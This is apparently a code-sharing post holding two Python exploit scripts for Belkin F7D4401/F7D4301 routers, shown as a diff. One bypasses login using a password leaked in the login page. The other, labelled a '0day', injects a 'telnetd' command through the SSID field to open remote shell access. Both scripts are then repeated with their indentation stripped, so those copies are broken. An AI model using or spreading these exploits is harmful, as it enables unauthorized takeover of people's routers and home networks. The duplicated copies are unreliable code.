BigNerd95 · February 20, 2017 18:01
diff --git a/belkin_enable_telnetd.py b/belkin_enable_telnetd.py
 #!/usr/bin/env python3

 # Belkin Router Persistent Remote Command Execution (0day)
 # Tested models: F7D4401, F7D4301
 # Tested firmware: 1.00.46 (latest firmware)
 # You bust be loggedin to run this exploit (you can use belkin_login_bypass.py exploit)
 # Author BigNerd95

 import sys, requests, re

 def enable_telnetd(ip):
 	print("Getting SSID...")
 	wlPage = requests.get("http://"+ip+"/wireless_id.stm")
 	srcSSID = re.search("document\.tF\['ssid'\]\.value=\"(.*)\";", wlPage.text)
 	if srcSSID:
 		SSID = srcSSID.group(1)
 		#print(SSID)
 	else:
 		print("SSID not found!")
 		exit(1)

 	if ';' in SSID:
 		print("SSID already injected!")
 		exit(1)

 	#cmd = "/usr/sbin/telnetd"
 	cmd = "telnetd"
 	
 	if len(SSID)+1+len(cmd) > 32:
 		print("SSID too long, it will be truncated...")
 		newlen = 32 - len(cmd) - 1
 		SSID = SSID[0:newlen]

 	newSSID = SSID+"%3B"+cmd

 	print("Injecting SSID...")
 	
 	payload = "page=radio.asp&location_page=wireless_id.stm&wl_bssid=&wl_unit=0&wl_action=1&wl_ssid="+newSSID+"&arc_action=Apply+Changes&wchan=1&ssid="+newSSID
 	ssidInjection = requests.post("http://"+ip+"/apply.cgi", data=payload)

 	err = re.search('countdown\(55\);', ssidInjection.text)
 	if err:
 		print("SSID injected!")
 	else:
 		print("Cannot inject SSID")
 		exit(1)
 	
 def main():
 	if len(sys.argv) == 2:
 		enable_telnetd(sys.argv[1])
 		print("Wait a minute, then run: telnet "+sys.argv[1])
 	else:
 		print("Usage: "+sys.argv[0]+" <belkin_router_ip>")

 if __name__ == '__main__':
    main()
diff --git a/belkin_login_bypass.py b/belkin_login_bypass.py
 #!/usr/bin/env python3

 # Belkin Login Bypass exploit
 # Tested models: F7D4401, F7D4301
 # Tested firmware: 1.00.46 (latest firmware)
 # Author BigNerd95

 import sys, requests, re

 def auth_bypass(ip):
 	print("Looking for info disclosure...")
 	loginPage = requests.get("http://"+ip+"/login.stm")
 	srcPwd = re.search('var password.*=.*"(.*)";', loginPage.text)

 	if srcPwd:
 		print("Info disclosure found!")
 		loginPwd = srcPwd.group(1)
 	else:
 		print("No info disclosure found!")
 		exit(1)



 	print("Logging in...")
 	payload = "totalMSec=0000000000.000&pws="+loginPwd+"&arc_action=login&pws_temp=&action=Submit"
 	login = requests.post("http://"+ip+"/login.cgi", data=payload)
 	err = re.search('loginpserr.stm', login.text)

 	if not err:
 		print("Logged in!")
 	else: 
 		print("Login failed")
 		exit(1)

 def main():
 	if len(sys.argv) == 2:
 		auth_bypass(sys.argv[1])
 		print("Go with your browser to http://"+sys.argv[1])
 	else:
 		print("Usage: "+sys.argv[0]+" <belkin_router_ip>")

 if __name__ == '__main__':
    main()
	#!/usr/bin/env python3

	# Belkin Router Persistent Remote Command Execution (0day)
	# Tested models: F7D4401, F7D4301
	# Tested firmware: 1.00.46 (latest firmware)
	# You bust be loggedin to run this exploit (you can use belkin_login_bypass.py exploit)
	# Author BigNerd95

	import sys, requests, re

	def enable_telnetd(ip):
	print("Getting SSID...")
	wlPage = requests.get("http://"+ip+"/wireless_id.stm")
	srcSSID = re.search("document\.tF\['ssid'\]\.value=\"(.*)\";", wlPage.text)
	if srcSSID:
	SSID = srcSSID.group(1)
	#print(SSID)
	else:
	print("SSID not found!")
	exit(1)

	if ';' in SSID:
	print("SSID already injected!")
	exit(1)

	#cmd = "/usr/sbin/telnetd"
	cmd = "telnetd"

	if len(SSID)+1+len(cmd) > 32:
	print("SSID too long, it will be truncated...")
	newlen = 32 - len(cmd) - 1
	SSID = SSID[0:newlen]

	newSSID = SSID+"%3B"+cmd

	print("Injecting SSID...")

	payload = "page=radio.asp&location_page=wireless_id.stm&wl_bssid=&wl_unit=0&wl_action=1&wl_ssid="+newSSID+"&arc_action=Apply+Changes&wchan=1&ssid="+newSSID
	ssidInjection = requests.post("http://"+ip+"/apply.cgi", data=payload)

	err = re.search('countdown\(55\);', ssidInjection.text)
	if err:
	print("SSID injected!")
	else:
	print("Cannot inject SSID")
	exit(1)

	def main():
	if len(sys.argv) == 2:
	enable_telnetd(sys.argv[1])
	print("Wait a minute, then run: telnet "+sys.argv[1])
	else:
	print("Usage: "+sys.argv[0]+" <belkin_router_ip>")

	if __name__ == '__main__':
	main()
	#!/usr/bin/env python3

	# Belkin Login Bypass exploit
	# Tested models: F7D4401, F7D4301
	# Tested firmware: 1.00.46 (latest firmware)
	# Author BigNerd95

	import sys, requests, re

	def auth_bypass(ip):
	print("Looking for info disclosure...")
	loginPage = requests.get("http://"+ip+"/login.stm")
	srcPwd = re.search('var password.=."(.*)";', loginPage.text)

	if srcPwd:
	print("Info disclosure found!")
	loginPwd = srcPwd.group(1)
	else:
	print("No info disclosure found!")
	exit(1)



	print("Logging in...")
	payload = "totalMSec=0000000000.000&pws="+loginPwd+"&arc_action=login&pws_temp=&action=Submit"
	login = requests.post("http://"+ip+"/login.cgi", data=payload)
	err = re.search('loginpserr.stm', login.text)

	if not err:
	print("Logged in!")
	else:
	print("Login failed")
	exit(1)

	def main():
	if len(sys.argv) == 2:
	auth_bypass(sys.argv[1])
	print("Go with your browser to http://"+sys.argv[1])
	else:
	print("Usage: "+sys.argv[0]+" <belkin_router_ip>")

	if __name__ == '__main__':
	main()